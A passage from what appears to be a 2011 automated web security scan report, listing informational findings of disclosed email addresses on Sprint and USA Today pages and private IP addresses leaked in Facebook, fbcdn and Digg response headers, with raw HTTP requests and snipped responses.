Referer: http://www.sprint.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=105E1B5AD68B10D605E2BDF5FE0A4306; TLTUID=105E1B5AD68B10D605E2BDF5FE0A4306; Apache=50.23.123.106.1315095358451950; TLisset=true; mbox=check#true#1315097121|session#1315097027971-178294#1315098921|disable#browser%20timeout#1315100658; naf=userSeg~Interstitial Home Page; s_cc=true; gpv_p37=Home%20Page; gpv_p38=HP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:08:53 GMT
Server: Apache/2.2.14 (Red Hat)
Last-Modified: Mon, 11 Oct 2010 20:38:40 GMT
ETag: "2f09b8-4339-4925d586d1400"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 17209
Content-Type: application/x-javascript

/****************************************
* Sprint Analytics Control File
* Designed and Developed by Numeric Analytics
*
* Lead Developer: Jason Eves jasone@numericanalytics.com
*
*
* Purpose: This code is meant to control
* the various aspects of web analytics for
* Sprint.com
*
* Logic for Voice of Customer survey system
*************************************
...[SNIP]...

24.24. http://www.sprint.com/legal/agreement.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sprint.com
Path:	/legal/agreement.html

Issue detail

The following email address was disclosed in the response:

abuse@sprint.net

Request

GET /legal/agreement.html HTTP/1.1
Host: www.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:27:46 GMT
Server: Apache/2.2.14 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Sprint | Acceptable Use Policy and Visitor Agreement
...[SNIP]...
<a href="mailto:abuse@sprint.net">abuse@sprint.net</a>
...[SNIP]...
<a href="mailto:abuse@sprint.net">abuse@sprint.net</a>
...[SNIP]...

24.25. http://www.sprint.com/legal/copyright.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sprint.com
Path:	/legal/copyright.html

Issue detail

The following email address was disclosed in the response:

copyrightnotice@sprint.com

Request

GET /legal/copyright.html HTTP/1.1
Host: www.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:27:50 GMT
Server: Apache/2.2.14 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<title>Sprint | Copyright and Trademark Notices</title>
...[SNIP]...
<a href="mailto:copyrightnotice@sprint.com">copyrightnotice@sprint.com</a>
...[SNIP]...

24.26. http://www.usatoday.com/marketing/feedback.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/marketing/feedback.htm

Issue detail

The following email address was disclosed in the response:

accuracy@usatoday.com

Request

GET /marketing/feedback.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.27. http://www.usatoday.com/marketing/questions.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/marketing/questions.htm

Issue detail

The following email addresses were disclosed in the response:

ResearchLine@usatoday.com
accuracy@usatoday.com
editor@usatoday.com
emailnewsletters@usatoday.com
feedback@feedroom.com
headlines@usatoday.com
permissions@usatoday.com
researchline@usatoday.com
sales@scoopreprintsource.com

Request

GET /marketing/questions.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79083
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAQQCSTTD=HFENPINAOJGOOPKGOLAKELOM; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:34 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">OAS_listpos =
"InvCount,PageCount,AdOps1,Top7
...[SNIP]...
<a href="mailto:emailnewsletters@usatoday.com">emailnewsletters@usatoday.com</a>
...[SNIP]...
<A href="mailto:researchline@usatoday.com">ResearchLine@usatoday.com</A>
...[SNIP]...
<A href="mailto:permissions@usatoday.com">permissions@usatoday.com</A>
...[SNIP]...
<A href="mailto:sales@scoopreprintsource.com">sales@scoopreprintsource.com</A>
...[SNIP]...
<a href="mailto:headlines@usatoday.com">headlines@usatoday.com</a>
...[SNIP]...
<a href="mailto:feedback@feedroom.com">
...[SNIP]...
<a href="mailto:editor@usatoday.com">editor@usatoday.com</a>
...[SNIP]...
<a href="mailto:accuracy@usatoday.com">accuracy@usatoday.com</a>
...[SNIP]...

25. Private IP addresses disclosed previous next
There are 31 instances of this issue:

http://developers.facebook.com/plugins/
http://digg.com/submit
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/6buK9-Tz27V.js
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/home.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/share.php
http://www.facebook.com/sharer.php
http://www.goutsa.com/ViewArticle.dbml

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

25.1. http://developers.facebook.com/plugins/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/plugins/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.28.35.105

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.2. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.129.225

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=26937 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8468

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
<span title="10.2.129.225 Build: 264 - Fri Sep 2 18:08:38 PDT 2011 15.00ms">
...[SNIP]...

25.3. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.154.41

Request

GET /safe_image.php?d=AQCtSjS0nizY4oai&url=http%3A%2F%2Fad.doubleclick.net%2Fad%2Fmi.clt00%2FNews%2FLocal%3Batf%3DY%3Bdcove%3Dd%3Bpl%3Dstory%3Bsect%3DNewsLocalNews%3Bpos%3D1%3Bsz%3D300x250%3Btile%3D4%3B%21c%3Dnews%3Bpub%3DCharlotteObserver2%3Bord%3D75145674926123%3Bgender%3D%3Byear%3D%3Bincome%3D%3F HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.154.41
X-Cnection: close
Content-Length: 18431
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Mon, 05 Sep 2011 00:44:50 GMT
Date: Sun, 04 Sep 2011 00:44:50 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

25.4. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.244.56

Request

GET /safe_image.php?d=AQCYSdUTMZOC4P9T&url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fstatic%2Fdesign%2Flogo-careerbuilder.gif HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/gif
X-FB-Server: 10.64.244.56
X-Cnection: close
Content-Length: 2898
Cache-Control: public, max-age=86400
Expires: Mon, 05 Sep 2011 01:13:06 GMT
Date: Sun, 04 Sep 2011 01:13:06 GMT
Connection: close

GIF89a.........[.d..................\vv..^......u..M...;;.dc..|'................k
........v...GG......-..j....r.........kLL..j......c))}-,.....[....^].......$${.........~~...o..h.a..c...G....h...o....
...[SNIP]...

25.5. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.32.42

Request

GET /safe_image.php?d=AQCuPNOI7DepDg34&url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F09%2F02%2F21%2F33%2FLrTcg.Em.138.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.63.32.42
X-Cnection: close
Content-Length: 20934
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Mon, 05 Sep 2011 00:44:50 GMT
Date: Sun, 04 Sep 2011 00:44:50 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

25.6. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.60.36

Request

GET /safe_image.php?d=AQDjvwza57X_RJ05&url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F09%2F03%2F16%2F17%2FWomle.Em.138.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.60.36
X-Cnection: close
Content-Length: 19351
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Mon, 05 Sep 2011 00:44:50 GMT
Date: Sun, 04 Sep 2011 00:44:50 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

25.7. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.173.32

Request

GET /safe_image.php?d=AQBM9j0Iju-FiD9f&url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F09%2F03%2F07%2F56%2FFP6Es.Em.138.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.173.32
X-Cnection: close
Content-Length: 23870
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Mon, 05 Sep 2011 00:44:50 GMT
Date: Sun, 04 Sep 2011 00:44:50 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

25.8. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.112.60

Request

GET /safe_image.php?d=AQDz2TYFnTBj9gyz&url=http%3A%2F%2Fwww.charlotteobserver.com%2Fstatic%2Fmagazines%2Fshared%2Fimages%2Ffacebook.png HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
X-FB-Server: 10.62.112.60
X-Cnection: close
Content-Length: 2171
Cache-Control: public, max-age=325
Expires: Sun, 04 Sep 2011 00:50:15 GMT
Date: Sun, 04 Sep 2011 00:44:50 GMT
Connection: close

.PNG
.
...IHDR...0...0.....W......BIDATh...M.d.....W.]]._...8:...... D. .....".H..A\....e..M6.. &.....\.U..*FL2.8~....mwMTW.{.9Y........T...T........s.......<.L..........@.R.R-b.kt.b}.M........3.
...[SNIP]...

25.9. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.181

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=5597051e9d2034b294865dbb43c47ee0&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df281409b84%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.charlotteobserver.com%2F2011%2F09%2F03%2F2577566%2Fraceday-danica-already-gone.html&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=225
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.16.181
Content-Length: 2481
Vary: Accept-Encoding
Cache-Control: public, max-age=68077
Expires: Sun, 04 Sep 2011 20:07:17 GMT
Date: Sun, 04 Sep 2011 01:12:40 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

25.10. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.194

Request

GET /connect/xd_proxy.php HTTP/1.1
Host: static.ak.fbcdn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.147.194
X-Cnection: close
Cache-Control: public, max-age=67535
Expires: Sun, 04 Sep 2011 20:09:51 GMT
Date: Sun, 04 Sep 2011 01:24:16 GMT
Content-Length: 2481
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

25.11. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/6buK9-Tz27V.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yQ/r/6buK9-Tz27V.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.191

Request

GET /rsrc.php/v1/yQ/r/6buK9-Tz27V.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 01 Sep 2011 16:22:02 GMT
X-FB-Server: 10.30.148.191
X-Cnection: close
Content-Length: 175246
Vary: Accept-Encoding
Cache-Control: public, max-age=31334388
Expires: Fri, 31 Aug 2012 16:44:38 GMT
Date: Sun, 04 Sep 2011 00:44:50 GMT
Connection: close

/*1314895489,169776319*/

if (window.CavalryLogger) { CavalryLogger.start_js(["ghcdO"]); }

function hasArrayNature(a){return (!!a&&(typeof a=='object'||typeof a=='function')&&('length' in a)&&!('setI
...[SNIP]...

25.12. http://www.facebook.com/campaign/landing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.194.30

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.13. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.196.55

Request

Response

25.14. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.214.45

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df337164584%26origin%3Dhttp%253A%252F%252Fwww.sacbee.com%252Ff2cc480d48%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17832e2e4%26origin%3Dhttp%253A%252F%252Fwww.sacbee.com%252Ff2cc480d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df351183554%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df356e68488%26origin%3Dhttp%253A%252F%252Fwww.sacbee.com%252Ff2cc480d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df351183554&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc27dfe64%26origin%3Dhttp%253A%252F%252Fwww.sacbee.com%252Ff2cc480d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df351183554&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3671fd398%26origin%3Dhttp%253A%252F%252Fwww.sacbee.com%252Ff2cc480d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df351183554&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.214.45
X-Cnection: close
Date: Sun, 04 Sep 2011 00:44:20 GMT
Content-Length: 22

Invalid Application ID

25.15. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.225.42

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.225.42
Connection: close
Date: Sun, 04 Sep 2011 01:26:02 GMT
Content-Length: 22

Invalid Application ID

25.16. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.154.42

Request

GET /extern/login_status.php?api_key=169549326390879&app_id=169549326390879&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df72b3c5cc%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff1e65ca694%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e9a0f894%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff1e65ca694%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7b422f7%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39f9c37e%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff1e65ca694%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7b422f7&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7c80e7dc%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff1e65ca694%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7b422f7&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11bc5edf%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff1e65ca694%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7b422f7&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/assets/commentsChild?canonical_article_id=/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&articleId=USTRE78222D20110903&headline=Notre+Dame+football+stadium+cleared+due+to+lightning&channel=domesticNews&edition=BETAUS&view=base
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
